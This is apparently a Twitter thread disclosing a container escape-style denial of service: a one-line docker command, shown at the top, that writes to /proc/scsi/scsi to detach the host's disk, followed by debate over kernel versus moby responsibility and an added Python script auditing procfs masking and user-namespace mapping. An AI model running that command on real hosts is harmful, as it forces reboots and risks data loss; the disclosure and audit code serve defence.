docker run --rm -it alpine sh -c 'echo "scsi remove-single-device 0 0 0 0">/proc/scsi/scsi'
(prevented by AppArmor & SELinux) #scsimicdrop
Gosh, I just realized in context people might think this is the vuln I was talking about above. IT IS NOT. I just dropped an 0day.
be careful running that command. You'll need to reboot the Docker container host and will have a low chance of losing data.
Also, I ran a poll a few weeks ago asking how folks would like me to do vulnerability disclosures and the winner was Twitter shitposting.
of course, I only learn from the best.
@SwiftOnSecurity has proven that shitposts are the best way to get folks to care.
Erica Windisch Retweeted Justin Cormack
This workaround is nice, but it's still a kernel vuln. The /proc/scsi/scsi should require CAP_SYS_ADMIN! https://twitter.com/justincormack/status/926467677245378560
Replying to @ewindisch @SwiftOnSecurity
really? you need GLOBAL_ROOT_UID access for it, no? and with that, you can do all sorts of fun things in procfs, like messing with sysctls
if moby gives containers GLOBAL_ROOT_UID and procfs access, blacklisting every dangerous file they know about, missing one, that's on them
just look at the commit you linked. they have a big blacklist of known ways to bypass their protections, and they missed one file.
the kernel has an API for giving containers fake root, and that is user namespaces. and if you don't want to use that, at least whitelist.
so IMO this is not a kernel bug
Replying to @tehjh @SwiftOnSecurity
Maybe users of your kernel are right vs what kernel developers prefer?
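The thread turns on two defender-side questions: is the workaround (masking /proc/scsi so a container cannot write to /proc/scsi/scsi) actually in effect in a given container, and does the container's root still map to host uid 0, the GLOBAL_ROOT_UID that the user-namespace argument is about. The following audit script is an added example, not code from Docker, moby, runc or anyone in the thread. It assumes that a masked path shows up in /proc/self/mountinfo as a read-only remount or as a tmpfs/devtmpfs overlay (the way runc's masked and read-only paths are implemented), and that /proc/self/uid_map in the initial user namespace reads "0 0 4294967295". The mountinfo and uid_map samples are constructed, not captured from a real host.

```python
"""Audit two container hardening controls discussed in the thread.

Assumptions of this added example (not Docker's or the kernel's own code):
  1. A masked procfs path is covered by a read-only mount or a tmpfs/devtmpfs
     overlay (empty tmpfs or /dev/null bind), as runc implements masking.
  2. /proc/self/uid_map lines are `inside_start outside_start count`.
"""
from typing import Dict, Iterable, List, Optional, Set, Tuple

# procfs paths the thread treats as dangerous when writable by in-container root.
SENSITIVE_PROC_PATHS = ("/proc/scsi", "/proc/sysrq-trigger", "/proc/sys")

Mount = Tuple[str, Set[str], str]  # (mount_point, per-mount options, fstype)


def parse_mountinfo(lines: Iterable[str]) -> List[Mount]:
    """Parse /proc/self/mountinfo lines into (mount_point, options, fstype).

    Layout: id parent maj:min root mount_point opts [optional...] - fstype source super_opts
    Optional fields (e.g. shared:1) are skipped by splitting on the " - " separator.
    """
    mounts: List[Mount] = []
    for line in lines:
        before, sep, after = line.strip().partition(" - ")
        fields = before.split()
        if not sep or len(fields) < 6:
            continue  # malformed line: skip rather than guess
        mount_point, options = fields[4], set(fields[5].split(","))
        fstype = after.split()[0] if after.split() else ""
        mounts.append((mount_point, options, fstype))
    return mounts


def covering_mount(mounts: List[Mount], path: str) -> Optional[Mount]:
    """Innermost mount covering `path`: longest mount point wins, and on a tie
    the later entry wins because it is stacked on top of the earlier one."""
    best: Optional[Mount] = None
    for mount in mounts:
        point = mount[0]
        if path == point or path.startswith(point.rstrip("/") + "/"):
            if best is None or len(point) >= len(best[0]):
                best = mount
    return best


def is_masked(mounts: List[Mount], path: str) -> bool:
    """True if the mount covering `path` blocks writes to the real procfs entry.
    The plain rw /proc mount covering everything underneath does not count."""
    mount = covering_mount(mounts, path)
    if mount is None:
        return False
    _point, options, fstype = mount
    return "ro" in options or fstype in ("tmpfs", "devtmpfs")


def root_maps_to_host_root(uid_map_lines: Iterable[str]) -> bool:
    """True if uid 0 in this namespace is host uid 0 (no user-namespace remap).
    An uid 0 that is not mapped at all counts as False."""
    for line in uid_map_lines:
        parts = line.split()
        if len(parts) != 3:
            continue
        inside, outside, count = (int(p) for p in parts)
        if inside <= 0 < inside + count:
            return outside + (0 - inside) == 0
    return False


def audit(mountinfo_lines: Iterable[str], uid_map_lines: Iterable[str]) -> Dict[str, bool]:
    """Summarise both controls as check name -> passed."""
    mounts = parse_mountinfo(mountinfo_lines)
    result = {f"masked:{p}": is_masked(mounts, p) for p in SENSITIVE_PROC_PATHS}
    result["root_is_not_host_root"] = not root_maps_to_host_root(uid_map_lines)
    return result


# Constructed samples (not captured from a real host).
# Before /proc/scsi was masked: only /proc/sys and /proc/sysrq-trigger are read-only.
MOUNTINFO_BEFORE = [
    "27 22 0:25 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw",
    "45 27 0:25 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw",
    "46 27 0:25 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw",
]
# After: an empty read-only tmpfs also covers /proc/scsi.
MOUNTINFO_AFTER = MOUNTINFO_BEFORE + ["52 27 0:30 / /proc/scsi ro,relatime - tmpfs tmpfs ro"]
UID_MAP_INITIAL_NS = ["         0          0 4294967295"]
UID_MAP_REMAPPED = ["         0     100000      65536"]

if __name__ == "__main__":
    for name, lines in (("before", MOUNTINFO_BEFORE), ("after", MOUNTINFO_AFTER)):
        print(name, audit(lines, UID_MAP_INITIAL_NS))
    try:  # live check of the current process, when running on Linux
        with open("/proc/self/mountinfo") as mi, open("/proc/self/uid_map") as um:
            print("live", audit(mi.readlines(), um.readlines()))
    except OSError:
        pass
```

Run inside a container to see both answers for that runtime: a result with `masked:/proc/scsi` False and `root_is_not_host_root` False is exactly the combination the thread argues about, a host-uid-0 root sitting on an unmasked procfs entry.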